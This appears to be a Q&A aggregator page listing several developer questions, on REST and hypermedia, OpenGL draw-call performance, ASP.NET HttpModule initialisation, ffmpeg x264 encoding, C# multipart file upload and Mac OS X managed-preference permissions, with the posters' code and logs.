inventory periodic monthly subscribe-to-alert-group configuration periodic monthly subscribe-to-alert-group telemetry periodic daily Cryptochecksum:0ed0580e151af288d865f4f3603d792a : end asdm image disk0:/asdm-635.bin no asdm history enable

    Read the article

  • Is That REST API Really RPC? Roy Fielding Seems to Think So.

    - by Rich Apodaca
    A large amount of what I thought I knew about REST is apparently wrong - and I'm not alone. This question has a long lead-in, but it seems to be necessary because the information is a bit scattered. The actual question comes at the end if you're already familiar with this topic. From the first paragraph of Roy Fielding's REST APIs must be hypertext-driven, it's pretty clear he believes his work is being widely misinterpreted: I am getting frustrated by the number of people calling any HTTP-based interface a REST API. Today’s example is the SocialSite REST API. That is RPC. It screams RPC. There is so much coupling on display that it should be given an X rating. Fielding goes on to list several attributes of a REST API. Some of them seem to go against both common practice and common advice on SO and other forums. For example: A REST API should be entered with no prior knowledge beyond the initial URI (bookmark) and set of standardized media types that are appropriate for the intended audience (i.e., expected to be understood by any client that might use the API). ... A REST API must not define fixed resource names or hierarchies (an obvious coupling of client and server). ... A REST API should spend almost all of its descriptive effort in defining the media type(s) used for representing resources and driving application state, or in defining extended relation names and/or hypertext-enabled mark-up for existing standard media types. ... The idea of "hypertext" plays a central role - much more so than URI structure or what HTTP verbs mean. "Hypertext" is defined in one of the comments: When I [Fielding] say hypertext, I mean the simultaneous presentation of information and controls such that the information becomes the affordance through which the user (or automaton) obtains choices and selects actions. Hypermedia is just an expansion on what text means to include temporal anchors within a media stream; most researchers have dropped the distinction. Hypertext does not need to be HTML on a browser. Machines can follow links when they understand the data format and relationship types. I'm guessing at this point, but the first two points above seem to suggest that API documentation for a Foo resource that looks like the following leads to tight coupling between client and server and has no place in a RESTful system. GET /foos/{id} # read a Foo POST /foos/{id} # create a Foo PUT /foos/{id} # update a Foo Instead, an agent should be forced to discover the URIs for all Foos by, for example, issuing a GET request against /foos. (Those URIs may turn out to follow the pattern above, but that's beside the point.) The response uses a media type that is capable of conveying how to access each item and what can be done with it, giving rise to the third point above. For this reason, API documentation should focus on explaining how to interpret the hypertext contained in the response. Furthermore, every time a URI to a Foo resource is requested, the response contains all of the information needed for an agent to discover how to proceed by, for example, accessing associated and parent resources through their URIs, or by taking action after the creation/deletion of a resource. The key to the entire system is that the response consists of hypertext contained in a media type that itself conveys to the agent options for proceeding. It's not unlike the way a browser works for humans. But this is just my best guess at this particular moment. Fielding posted a follow-up in which he responded to criticism that his discussion was too abstract, lacking in examples, and jargon-rich: Others will try to decipher what I have written in ways that are more direct or applicable to some practical concern of today. I probably won’t, because I am too busy grappling with the next topic, preparing for a conference, writing another standard, traveling to some distant place, or just doing the little things that let me feel I have I earned my paycheck. So, two simple questions for the REST experts out there with a practical mindset: how do you interpret what Fielding is saying and how do you put it into practice when documenting/implementing REST APIs? Edit: this question is an example of how hard it can be to learn something if you don't have a name for what you're talking about. The name in this case is "Hypermedia as the Engine of Application State" (HATEOAS).

    Read the article

  • OpenGL basics: calling glDrawElements once per object

    - by Bethor
    Hi all, continuing on from my explorations of the basics of OpenGL (see this question), I'm trying to figure out the basic principles of drawing a scene with OpenGL. I am trying to render a simple cube repeated n times in every direction. My method appears to yield terrible performance : 1000 cubes brings performance below 50fps (on a QuadroFX 1800, roughly a GeForce 9600GT). My method for drawing these cubes is as follows: done once: set up a vertex buffer and array buffer containing my cube vertices in model space set up an array buffer indexing the cube for drawing as 12 triangles done for each frame: update uniform values used by the vertex shader to move all cubes at once done for each cube, for each frame: update uniform values used by the vertex shader to move each cube to its position call glDrawElements to draw the positioned cube Is this a sane method ? If not, how does one go about something like this ? I'm guessing I need to minimize calls to glUniform, glDrawElements, or both, but I'm not sure how to do that. Full code for my little test : (depends on gletools and pyglet) I'm aware that my init code (at least) is really ugly; I'm concerned with the rendering code for each frame right now, I'll move to something a little less insane for the creation of the vertex buffers and such later on. import pyglet from pyglet.gl import * from pyglet.window import key from numpy import deg2rad, tan from gletools import ShaderProgram, FragmentShader, VertexShader, GeometryShader vertexData = [-0.5, -0.5, -0.5, 1.0, -0.5, 0.5, -0.5, 1.0, 0.5, -0.5, -0.5, 1.0, 0.5, 0.5, -0.5, 1.0, -0.5, -0.5, 0.5, 1.0, -0.5, 0.5, 0.5, 1.0, 0.5, -0.5, 0.5, 1.0, 0.5, 0.5, 0.5, 1.0] elementArray = [2, 1, 0, 1, 2, 3,## back face 4, 7, 6, 4, 5, 7,## front face 1, 3, 5, 3, 7, 5,## top face 2, 0, 4, 2, 4, 6,## bottom face 1, 5, 4, 0, 1, 4,## left face 6, 7, 3, 6, 3, 2]## right face def toGLArray(input): return (GLfloat*len(input))(*input) def toGLushortArray(input): return (GLushort*len(input))(*input) def initPerspectiveMatrix(aspectRatio = 1.0, fov = 45): frustumScale = 1.0 / tan(deg2rad(fov) / 2.0) fzNear = 0.5 fzFar = 300.0 perspectiveMatrix = [frustumScale*aspectRatio, 0.0 , 0.0 , 0.0 , 0.0 , frustumScale, 0.0 , 0.0 , 0.0 , 0.0 , (fzFar+fzNear)/(fzNear-fzFar) , -1.0, 0.0 , 0.0 , (2*fzFar*fzNear)/(fzNear-fzFar), 0.0 ] return perspectiveMatrix class ModelObject(object): vbo = GLuint() vao = GLuint() eao = GLuint() initDone = False verticesPool = [] indexPool = [] def __init__(self, vertices, indexing): super(ModelObject, self).__init__() if not ModelObject.initDone: glGenVertexArrays(1, ModelObject.vao) glGenBuffers(1, ModelObject.vbo) glGenBuffers(1, ModelObject.eao) glBindVertexArray(ModelObject.vao) initDone = True self.numIndices = len(indexing) self.offsetIntoVerticesPool = len(ModelObject.verticesPool) ModelObject.verticesPool.extend(vertices) self.offsetIntoElementArray = len(ModelObject.indexPool) ModelObject.indexPool.extend(indexing) glBindBuffer(GL_ARRAY_BUFFER, ModelObject.vbo) glEnableVertexAttribArray(0) #position glVertexAttribPointer(0, 4, GL_FLOAT, GL_FALSE, 0, 0) glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, ModelObject.eao) glBufferData(GL_ARRAY_BUFFER, len(ModelObject.verticesPool)*4, toGLArray(ModelObject.verticesPool), GL_STREAM_DRAW) glBufferData(GL_ELEMENT_ARRAY_BUFFER, len(ModelObject.indexPool)*2, toGLushortArray(ModelObject.indexPool), GL_STREAM_DRAW) def draw(self): glDrawElements(GL_TRIANGLES, self.numIndices, GL_UNSIGNED_SHORT, self.offsetIntoElementArray) class PositionedObject(object): def __init__(self, mesh, pos, objOffsetUf): super(PositionedObject, self).__init__() self.mesh = mesh self.pos = pos self.objOffsetUf = objOffsetUf def draw(self): glUniform3f(self.objOffsetUf, self.pos[0], self.pos[1], self.pos[2]) self.mesh.draw() w = 800 h = 600 AR = float(h)/float(w) window = pyglet.window.Window(width=w, height=h, vsync=False) window.set_exclusive_mouse(True) pyglet.clock.set_fps_limit(None) ## input forward = [False] left = [False] back = [False] right = [False] up = [False] down = [False] inputs = {key.Z: forward, key.Q: left, key.S: back, key.D: right, key.UP: forward, key.LEFT: left, key.DOWN: back, key.RIGHT: right, key.PAGEUP: up, key.PAGEDOWN: down} ## camera camX = 0.0 camY = 0.0 camZ = -1.0 def simulate(delta): global camZ, camX, camY scale = 10.0 move = scale*delta if forward[0]: camZ += move if back[0]: camZ += -move if left[0]: camX += move if right[0]: camX += -move if up[0]: camY += move if down[0]: camY += -move pyglet.clock.schedule(simulate) @window.event def on_key_press(symbol, modifiers): global forward, back, left, right, up, down if symbol in inputs.keys(): inputs[symbol][0] = True @window.event def on_key_release(symbol, modifiers): global forward, back, left, right, up, down if symbol in inputs.keys(): inputs[symbol][0] = False ## uniforms for shaders camOffsetUf = GLuint() objOffsetUf = GLuint() perspectiveMatrixUf = GLuint() camRotationUf = GLuint() program = ShaderProgram( VertexShader(''' #version 330 layout(location = 0) in vec4 objCoord; uniform vec3 objOffset; uniform vec3 cameraOffset; uniform mat4 perspMx; void main() { mat4 translateCamera = mat4(1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, cameraOffset.x, cameraOffset.y, cameraOffset.z, 1.0f); mat4 translateObject = mat4(1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, objOffset.x, objOffset.y, objOffset.z, 1.0f); vec4 modelCoord = objCoord; vec4 positionedModel = translateObject*modelCoord; vec4 cameraPos = translateCamera*positionedModel; gl_Position = perspMx * cameraPos; }'''), FragmentShader(''' #version 330 out vec4 outputColor; const vec4 fillColor = vec4(1.0f, 1.0f, 1.0f, 1.0f); void main() { outputColor = fillColor; }''') ) shapes = [] def init(): global camOffsetUf, objOffsetUf with program: camOffsetUf = glGetUniformLocation(program.id, "cameraOffset") objOffsetUf = glGetUniformLocation(program.id, "objOffset") perspectiveMatrixUf = glGetUniformLocation(program.id, "perspMx") glUniformMatrix4fv(perspectiveMatrixUf, 1, GL_FALSE, toGLArray(initPerspectiveMatrix(AR))) obj = ModelObject(vertexData, elementArray) nb = 20 for i in range(nb): for j in range(nb): for k in range(nb): shapes.append(PositionedObject(obj, (float(i*2), float(j*2), float(k*2)), objOffsetUf)) glEnable(GL_CULL_FACE) glCullFace(GL_BACK) glFrontFace(GL_CW) glEnable(GL_DEPTH_TEST) glDepthMask(GL_TRUE) glDepthFunc(GL_LEQUAL) glDepthRange(0.0, 1.0) glClearDepth(1.0) def update(dt): print pyglet.clock.get_fps() pyglet.clock.schedule_interval(update, 1.0) @window.event def on_draw(): with program: pyglet.clock.tick() glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT) glUniform3f(camOffsetUf, camX, camY, camZ) for shape in shapes: shape.draw() init() pyglet.app.run()

    Read the article

  • HttpModule Init method is called several times - why?

    - by MartinF
    I was creating a http module and while debugging I noticed something which at first (at least) seemed like weird behaviour. When i set a breakpoint in the init method of the httpmodule i can see that the http module init method is being called several times even though i have only started up the website for debugging and made one single request (sometimes it is hit only 1 time, other times as many as 10 times). I know that I should expect several instances of the HttpApplication to be running and for each the http modules will be created, but when i request a single page it should be handled by a single http application object and therefore only fire the events associated once, but still it fires the events several times for each request which makes no sense - other than it must have been added several times within that httpApplication - which means it is the same httpmodule init method which is being called every time and not a new http application being created each time it hits my break point (see my code example at the bottom etc.). What could be going wrong here ? is it because i am debugging and set a breakpoint in the http module? It have noticed that it seems that if i startup the website for debugging and quickly step over the breakpoint in the httpmodule it will only hit the init method once and the same goes for the eventhandler. If I instead let it hang at the breakpoint for a few seconds the init method is being called several times (seems like it depends on how long time i wait before stepping over the breakpoint). Maybe this could be some build in feature to make sure that the httpmodule is initialised and the http application can serve requests , but it also seems like something that could have catastrophic consequences. This could seem logical, as it might be trying to finish the request and since i have set the break point it thinks something have gone wrong and try to call the init method again ? soo it can handle the request ? But is this what is happening and is everything fine (i am just guessing), or is it a real problem ? What i am specially concerned about is that if something makes it hang on the "production/live" server for a few seconds a lot of event handlers are added through the init and therefore each request to the page suddenly fires the eventhandler several times. This behaviour could quickly bring any site down. I have looked at the "original" .net code used for the httpmodules for formsauthentication and the rolemanagermodule etc but my code isnt any different that those modules uses. My code looks like this. public void Init(HttpApplication app) { if (CommunityAuthenticationIntegration.IsEnabled) { FormsAuthenticationModule formsAuthModule = (FormsAuthenticationModule) app.Modules["FormsAuthentication"]; formsAuthModule.Authenticate += new FormsAuthenticationEventHandler(this.OnAuthenticate); } } here is an example how it is done in the RoleManagerModule from the .NET framework public void Init(HttpApplication app) { if (Roles.Enabled) { app.PostAuthenticateRequest += new EventHandler(this.OnEnter); app.EndRequest += new EventHandler(this.OnLeave); } } Do anyone know what is going on? (i just hope someone out there can tell me why this is happening and assure me that everything is perfectly fine) :) UPDATE: I have tried to narrow down the problem and so far i have found that the Init method being called is always on a new object of my http module (contary to what i thought before). I seems that for the first request (when starting up the site) all of the HttpApplication objects being created and its modules are all trying to serve the first request and therefore all hit the eventhandler that is being added. I cant really figure out why this is happening. If i request another page all the HttpApplication's created (and their moduless) will again try to serve the request causing it to hit the eventhandler multiple times. But it also seems that if i then jump back to the first page (or another one) only one HttpApplication will start to take care of the request and everything is as expected - as long as i dont let it hang at a break point. If i let it hang at a breakpoint it begins to create new HttpApplication's objects and starts adding HttpApplications (more than 1) to serve/handle the request (which is already in process of being served by the HttpApplication which is currently stopped at the breakpoint). I guess or hope that it might be some intelligent "behind the scenes" way of helping to distribute and handle load and / or errors. But I have no clue. I hope some out there can assure me that it is perfectly fine and how it is supposed to be?

    Read the article

  • Use DivX settings to encode to mp4 with ffmpeg

    - by sjngm
    I'm used to use VirtualDub to encode a video to AVI container with DivX-codec (and MP3 for audio). Now I'm planning to use ffmpeg to encode videos to MP4 container with h264-codec. What I've figured out is that I need to use libx264 and one of those presets to make anything work. However, I'm amazed about the video bitrate ffmpeg uses for encoding. What I currently have is this little batch file: @ECHO OFF SETLOCAL SET IN=source.avs SET FFMPEG_PATH=C:\Program Files (x86)\ffmpeg SET PRESET=-fpre "%FFMPEG_PATH%\presets\libx264-lossless_slow.ffpreset" SET AUDIO=-acodec libmp3lame -ab 128000 SET VIDEO=-vcodec libx264 -vb 1978000 "%FFMPEG_PATH%\ffmpeg.exe" -i %IN% %AUDIO% %VIDEO% %PRESET% test.mp4 ENDLOCAL With this I tell ffmpeg to use 1978k as the bitrate, but ffmpeg uses 15000k+! I tried other presets, but they don't use my specified bitrate. Here are the presets I have: libx264-baseline.ffpreset libx264-ipod320.ffpreset libx264-ipod640.ffpreset libx264-lossless_fast.ffpreset libx264-lossless_max.ffpreset libx264-lossless_medium.ffpreset libx264-lossless_slow.ffpreset libx264-lossless_slower.ffpreset libx264-lossless_ultrafast.ffpreset ffmpeg version: FFmpeg git-N-29181-ga304071 libavutil 50. 40. 1 / 50. 40. 1 libavcodec 52.120. 0 / 52.120. 0 libavformat 52.108. 0 / 52.108. 0 libavdevice 52. 4. 0 / 52. 4. 0 libavfilter 1. 79. 0 / 1. 79. 0 libswscale 0. 13. 0 / 0. 13. 0 Note that I don't use the latest version as it has problems with spaces in filenames. Here's what seems to be the full parameter list DivX 6.9.2 uses: -bvnn 1978000 -vbv 218691200,100663296,100663296 -dir "C:\Users\sjngm\AppData\Roaming\DivX\DivX Codec" -w -b 1 -use_presets=1 -preset=10 -windowed_fullsearch=2 -thread_delay=1 What command line parameters would that be for ffmpeg? EDIT: Going with slhck's suggestion I tried a new 32-bit version. I have no idea if that is 0.9 or newer, I can't find that info. ffmpeg version N-36890-g67f5650 libavutil 51. 34.100 / 51. 34.100 libavcodec 53. 56.105 / 53. 56.105 libavformat 53. 30.100 / 53. 30.100 libavdevice 53. 4.100 / 53. 4.100 libavfilter 2. 59.100 / 2. 59.100 libswscale 2. 1.100 / 2. 1.100 libswresample 0. 6.100 / 0. 6.100 libpostproc 51. 2.100 / 51. 2.100 I reworked my batch file to look like this (interestingly enough I can't find parameter -vprofile in the documentation): @ECHO OFF SETLOCAL SET IN=VTS_01_1.avs SET FFMPEG_PATH=C:\Program Files (x86)\ffmpeg SET PRESET=-vprofile high -preset veryslow SET AUDIO=-acodec libmp3lame -ab 128000 SET VIDEO=-vcodec libx264 -vb 1978000 "%FFMPEG_PATH%\ffmpeg.exe" -i %IN% %AUDIO% %PRESET% %VIDEO% test.mp4 ENDLOCAL I see that it now uses the bitrate properly (thanks to LongNeckbeard for pointing out that the lossless-stuff ignores the bitrate!). Just in case you wonder how I came up with the 1978000, I'm using this formula which I found valid for DivX-files (I'm guessing the bitrate won't change that much for h264): width * height * 25 * 0.22 / 1000 I'm not sure if the 0.22 correlates with the CRF somehow. Overall I forgot to say the I will use a two-pass scenario, which is why I don't use the CRF here. I will try to read more about this. Currently I'm just trying to get something running that shows me that I'm doing something right (ffmpeg isn't the easiest tool to understand ;)). C:\Program Files (x86)\ffmpeg\ffmpeg.exe" -i VTS_01_1.avs -acodec libmp3lame -ab 128000 -vcodec libx264 -vb 1978000 -vprofile high -preset veryslow test.mp4 The output is now: ffmpeg version N-36890-g67f5650 Copyright (c) 2000-2012 the FFmpeg developers built on Jan 16 2012 21:57:13 with gcc 4.6.2 configuration: --enable-gpl --enable-version3 --disable-w32threads --enable-runtime-cpudetect --enable-avisynth --enable-bzlib --enable-frei0r --enable-libopencore-amrnb --enable-libopencore-amrwb --enable-libfreetype --enable-libgsm --enable-libmp3lame --enable-libopenjpeg --enable-librtmp --enable-libschroedinger --enable-libspeex --enable-libtheora --enable-libvo-aacenc --enable-libvo-amrwbenc --enable-libvorbis --enable-libvpx --enable-libx264 --enable-libxavs --enable-libxvid --enable-zlib libavutil 51. 34.100 / 51. 34.100 libavcodec 53. 56.105 / 53. 56.105 libavformat 53. 30.100 / 53. 30.100 libavdevice 53. 4.100 / 53. 4.100 libavfilter 2. 59.100 / 2. 59.100 libswscale 2. 1.100 / 2. 1.100 libswresample 0. 6.100 / 0. 6.100 libpostproc 51. 2.100 / 51. 2.100 Input #0, avs, from 'VTS_01_1.avs': Duration: 00:58:46.12, start: 0.000000, bitrate: 0 kb/s Stream #0:0: Video: rawvideo (YV12 / 0x32315659), yuv420p, 576x448, 77414 kb/s, 25 tbr, 25 tbn, 25 tbc Stream #0:1: Audio: pcm_s16le ([1][0][0][0] / 0x0001), 48000 Hz, 2 channels, s16, 1536 kb/s File 'test.mp4' already exists. Overwrite ? [y/N] y w:576 h:448 pixfmt:yuv420p tb:1/1000000 sar:0/1 sws_param: [libx264 @ 05A2C400] using cpu capabilities: MMX2 SSE2Fast FastShuffle SSEMisalign LZCNT [libx264 @ 05A2C400] profile High, level 3.1 [libx264 @ 05A2C400] 264 - core 120 r2120 0c7dab9 - H.264/MPEG-4 AVC codec - Copyleft 2003-2011 - http://www.videolan.org/x264.html - options: cabac=1 ref=16 deblock=1:0:0 analyse=0x3:0x133 me=umh subme=10 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=24 chroma_me=1 trellis=2 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=3 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=8 b_pyramid=2 b_adapt=2 b_bias=0 direct=3 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=60 rc=abr mbtree=1 bitrate=1978 ratetol=1.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00 Output #0, mp4, to 'test.mp4': Metadata: encoder : Lavf53.30.100 Stream #0:0: Video: h264 (![0][0][0] / 0x0021), yuv420p, 576x448, q=-1--1, 1978 kb/s, 25 tbn, 25 tbc Stream #0:1: Audio: mp3 (i[0][0][0] / 0x0069), 48000 Hz, 2 channels, s16, 128 kb/s Stream mapping: Stream #0:0 -> #0:0 (rawvideo -> libx264) Stream #0:1 -> #0:1 (pcm_s16le -> libmp3lame) Press [q] to stop, [?] for help frame= 0 fps= 0 q=0.0 size= 0kB time=00:00:00.00 bitrate= 0.0kbits/s frame= 0 fps= 0 q=0.0 size= 0kB time=00:00:00.00 bitrate= 0.0kbits/s frame= 0 fps= 0 q=0.0 size= 0kB time=00:00:00.00 bitrate= 0.0kbits/s frame= 3 fps= 1 q=22.0 size= 39kB time=00:00:00.04 bitrate=8063.8kbits/ frame= 8 fps= 2 q=22.0 size= 82kB time=00:00:00.24 bitrate=2801.3kbits/ frame= 13 fps= 3 q=23.0 size= 120kB time=00:00:00.44 bitrate=2229.5kbits/ frame= 16 fps= 4 q=23.0 size= 147kB time=00:00:00.56 bitrate=2156.7kbits/ frame= 20 fps= 4 q=22.0 size= 175kB time=00:00:00.72 bitrate=1987.4kbits/ : video:4387kB audio:273kB global headers:0kB muxing overhead 0.260038% [libx264 @ 05A2C400] frame I:2 Avg QP:19.53 size: 29850 [libx264 @ 05A2C400] frame P:76 Avg QP:22.24 size: 19541 [libx264 @ 05A2C400] frame B:359 Avg QP:25.93 size: 8210 [libx264 @ 05A2C400] consecutive B-frames: 0.5% 0.5% 0.0% 8.2% 17.2% 52.2% 16.0% 5.5% 0.0% [libx264 @ 05A2C400] mb I I16..4: 5.4% 75.3% 19.3% [libx264 @ 05A2C400] mb P I16..4: 1.3% 16.5% 2.2% P16..4: 36.3% 28.6% 12.7% 1.8% 0.2% skip: 0.4% [libx264 @ 05A2C400] mb B I16..4: 0.4% 3.8% 0.3% B16..8: 40.0% 18.4% 4.7% direct:18.5% skip:13.9% L0:45.4% L1:38.1% BI:16.5% [libx264 @ 05A2C400] final ratefactor: 20.35 [libx264 @ 05A2C400] 8x8 transform intra:83.1% inter:68.5% [libx264 @ 05A2C400] direct mvs spatial:99.2% temporal:0.8% [libx264 @ 05A2C400] coded y,uvDC,uvAC intra: 64.9% 83.4% 49.2% inter: 49.0% 50.4% 4.4% [libx264 @ 05A2C400] i16 v,h,dc,p: 25% 22% 27% 26% [libx264 @ 05A2C400] i8 v,h,dc,ddl,ddr,vr,hd,vl,hu: 10% 7% 23% 9% 10% 10% 10%10% 13% [libx264 @ 05A2C400] i4 v,h,dc,ddl,ddr,vr,hd,vl,hu: 12% 11% 13% 9% 12% 11% 10% 9% 12% [libx264 @ 05A2C400] i8c dc,h,v,p: 42% 28% 16% 14% [libx264 @ 05A2C400] Weighted P-Frames: Y:18.4% UV:7.9% [libx264 @ 05A2C400] ref P L0: 29.1% 11.3% 15.7% 7.3% 6.9% 4.9% 5.1% 3.4%3.9% 2.7% 2.8% 1.8% 1.7% 1.2% 1.4% 0.9% [libx264 @ 05A2C400] ref B L0: 68.8% 11.4% 5.5% 2.9% 2.3% 1.9% 1.5% 1.1%1.1% 1.0% 0.9% 0.7% 0.5% 0.3% 0.1% [libx264 @ 05A2C400] ref B L1: 91.9% 8.1% [libx264 @ 05A2C400] kb/s:2055.88 As far as I'm concerned it doesn't look that bad to me.

    Read the article

  • How to simulate browser file upload with HttpWebRequest

    - by cucicov
    Hi, guys, first of all thanks for your contributions, I've found great responses here. Yet I've ran into a problem I can't figure out and if someone could provide any help, it would be greatly appreciated. I'm developing this application in C# that could upload an image from computer to user photoblog. For this I'm usig pixelpost platform for photoblogs that is written mainly in PHP. I've searched here and on other web pages, but the exmples provided there didn't work for me. Here is what I used in my example: (http://stackoverflow.com/questions/566462/upload-files-with-httpwebrequest-multipart-form-data) and (http://bytes.com/topic/c-sharp/answers/268661-how-upload-file-via-c-code) Once it is ready I will make it available for free on the internet and maybe also create a windows mobile version of it, since I'm a fan of pixelpost. here is the code I've used: string formUrl = "http://localhost/pixelpost/admin/index.php?x=login"; string formParams = string.Format("user={0}&password={1}", "user-String", "password-String"); string cookieHeader; HttpWebRequest req = (HttpWebRequest)HttpWebRequest.Create(formUrl); req.ContentType = "application/x-www-form-urlencoded"; req.Method = "POST"; req.AllowAutoRedirect = false; byte[] bytes = Encoding.ASCII.GetBytes(formParams); req.ContentLength = bytes.Length; using (Stream os = req.GetRequestStream()) { os.Write(bytes, 0, bytes.Length); } HttpWebResponse resp = (HttpWebResponse)req.GetResponse(); cookieHeader = resp.Headers["Set-Cookie"]; string pageSource; using (StreamReader sr = new StreamReader(resp.GetResponseStream())) { pageSource = sr.ReadToEnd(); Console.WriteLine(); } string getUrl = "http://localhost/pixelpost/admin/index.php"; HttpWebRequest getRequest = (HttpWebRequest)HttpWebRequest.Create(getUrl); getRequest.Headers.Add("Cookie", cookieHeader); HttpWebResponse getResponse = (HttpWebResponse)getRequest.GetResponse(); using (StreamReader sr = new StreamReader(getResponse.GetResponseStream())) { pageSource = sr.ReadToEnd(); } // end first part: login to admin panel long length = 0; string boundary = "----------------------------" + DateTime.Now.Ticks.ToString("x"); HttpWebRequest httpWebRequest2 = (HttpWebRequest)WebRequest.Create("http://localhost/pixelpost/admin/index.php?x=save"); httpWebRequest2.ContentType = "multipart/form-data; boundary=" + boundary; httpWebRequest2.Method = "POST"; httpWebRequest2.AllowAutoRedirect = false; httpWebRequest2.KeepAlive = false; httpWebRequest2.Credentials = System.Net.CredentialCache.DefaultCredentials; httpWebRequest2.Headers.Add("Cookie", cookieHeader); Stream memStream = new System.IO.MemoryStream(); byte[] boundarybytes = System.Text.Encoding.ASCII.GetBytes("\r\n--" + boundary + "\r\n"); string formdataTemplate = "\r\n--" + boundary + "\r\nContent-Disposition: form-data; name=\"{0}\";\r\n\r\n{1}"; string formitem = string.Format(formdataTemplate, "headline", "image-name"); byte[] formitembytes = System.Text.Encoding.UTF8.GetBytes(formitem); memStream.Write(formitembytes, 0, formitembytes.Length); memStream.Write(boundarybytes, 0, boundarybytes.Length); string headerTemplate = "\r\nContent-Disposition: form-data; name=\"{0}\"; filename=\"{1}\"\r\nContent-Type: application/octet-stream\r\n\r\n"; string header = string.Format(headerTemplate, "userfile", "path-to-the-local-file"); byte[] headerbytes = System.Text.Encoding.UTF8.GetBytes(header); memStream.Write(headerbytes, 0, headerbytes.Length); FileStream fileStream = new FileStream("path-to-the-local-file", FileMode.Open, FileAccess.Read); byte[] buffer = new byte[1024]; int bytesRead = 0; while ((bytesRead = fileStream.Read(buffer, 0, buffer.Length)) != 0) { memStream.Write(buffer, 0, bytesRead); } memStream.Write(boundarybytes, 0, boundarybytes.Length); fileStream.Close(); httpWebRequest2.ContentLength = memStream.Length; Stream requestStream = httpWebRequest2.GetRequestStream(); memStream.Position = 0; byte[] tempBuffer = new byte[memStream.Length]; memStream.Read(tempBuffer, 0, tempBuffer.Length); memStream.Close(); requestStream.Write(tempBuffer, 0, tempBuffer.Length); requestStream.Close(); WebResponse webResponse2 = httpWebRequest2.GetResponse(); Stream stream2 = webResponse2.GetResponseStream(); StreamReader reader2 = new StreamReader(stream2); Console.WriteLine(reader2.ReadToEnd()); webResponse2.Close(); httpWebRequest2 = null; webResponse2 = null; and also here is the PHP: (http://dl.dropbox.com/u/3149888/index.php) and (http://dl.dropbox.com/u/3149888/new_image.php) the mandatory fields are headline and userfile so I can't figure out where the mistake is, as the format sent in right. I'm guessing there is something wrong with the octet-stream sent to the form. Maybe it's a stupid mistake I wasn't able to trace, in any case, if you could help me that would mean a lot. thanks,

    Read the article

  • How can I resolve this one application coming up with an "You don't have permission to use the application" error?

    - by morgant
    I've got a Mac OS X 10.6 Snow Leopard Server Open Directory Master with a user who's getting Mobility & Application managed preferences from a group (the only group they're a member of). The workstation is also running Mac OS X 10.6 Snow Leopard, when the user logs in and tries to run our primary application which they're explicitly allowed to run (via the group's preferences), it says "You don't have permission to use the application 'Blah'". Now, the application is added to the group's list of always allowed applications, unsigned (so a minor difference in application version or file contents shouldn't disallow it). It even lives in a subdirectory of /Applications which is in the list of folders to allow applications. I've run into this when logging this user into new workstations and the following usually works: Log them out Remove the following files from their mobile home folder on the workstation: /Library/Managed\ Preferences/, ~/.FileSync, ~/Library/Preferences/com.apple.finder.plist, and ~/Library/Preferences/com.apple.MCX.plist. Remove the following files from their network home folder on the server: ~/.FileSync, ~/Library/Preferences/com.apple.finder.plist, and ~/Library/Preferences/com.apple.MCX.plist. Log them back in on the workstation. However, this no longer resolves the issue. Their Home Sync preferences are set (on the group) to sync ~, but not the following files (manually, at login, and at logout... no background sync here): ~/.SymAVQSFile ~/NAVMac800QSFile ~/Library ~/.FileSync ~/.account Their Preferences Sync preferences are set (also on the group) to sync ~/Library & ~/Documents/Microsoft User Data, but not the following files (also manually, at login, and at logout... no background sync): ~/.SymAVQSFile ~/.Trash ~/.Trashes ~/Documents/Microsoft User Data/Entourage Temp ~/Library/Application Support/SyncServices ~/Library/Application Support/MobileSync ~/Library/Caches ~/Library/Calendars/Calendar Cache ~/Library/Logs ~/Library/Mail/AvailableFeeds ~/Library/Mail/Envelope Index ~/Library/Preferences/Macromedia/ ~/Library/Printers ~/Library/PubSub/Database ~/Library/PubSub/Downloads ~/Library/PubSub/Feeds ~/Library/Safari/Icons.db ~/Library/Safari/HistoryIndex.sk ~/Library/iTunes/iPhone Software Updates IMAP-* Exchange-* EWS-* Mac-* ~/Library/Preferences/ByHost ~/Library/Preferences/com.apple.dock.plist ~/Library/Preferences/com.apple.sitebarlists.plist ~/Library/Application Support/4D ~/Library/Preferences/com.apple.MCX.plist ~/.FileSync ~/.account Even with ~/Library/Preferences/com.apple.MCX.plist prevented from syncing during a Preferences Sync, it still seems to show up in the network home on the server frequently. Are there any other files other than ~/Library/Preferences/com.apple.MCX.plist that contain application Managed Preferences that might be causing this one app to be showing up as not allowed? Any ideas on how ~/Library/Preferences/com.apple.MCX.plist keeps getting sync'd back up the network home folder on the server? Update: I thought I had found a workaround this morning, but it also seemed to be extremely temporary. Basically, loking at /Library/Managed\ Preferences/[shortname]/com.apple.applicationaccess.new.plist I discovered that it didn't have an entry for the application in question, but /Library/Managed\ Preferences/[shortname]/complete.plist did. Naturally, I deleted com.apple.applicationaccess.new.plist, logged in again, and it worked... on one workstation. It failed on others, and after logging out & back in a couple more times it started failing on all of them again, even after further deletions of com.apple.applicationaccess.new.plist. Oddly, com.apple.applicationaccess.new.plist & complete.plist do both contain an entry for the application in question now, but it still says it's not allowed. Further Update: Okay, so I now have a reproducible workaround which seems to be required after every reboot of the workstation: Log in as the user (you'll discover you cannot launch the application in question). Fast User Switch to the local admin account on the workstation (we always have one on every machine). From that local admin account, run sudo mcxrefresh -n 'shortname' (logging out and back in as the user in question will not work). Fast User Switch back to the user (you'll still not be allowed to run the application). Log the user out and back in (you'll now be able to run the application in question.) Fast User Switch back to the local admin account, log it out, and log back in as the user in question. If you do all that exactly as described it'll keep working through log out & log back in, but NOT through a reboot. If, after a reboot, you try something like logging in as the local admin account, running sudo mcxrefresh -n 'shortname', logging out, then logging in as the user in question, it will NOT work. Yet Another Update We don't have any computer groups in our Open Directory, so it shouldn't be getting any conflicting settings from there. I ran sudo mcxquery -format 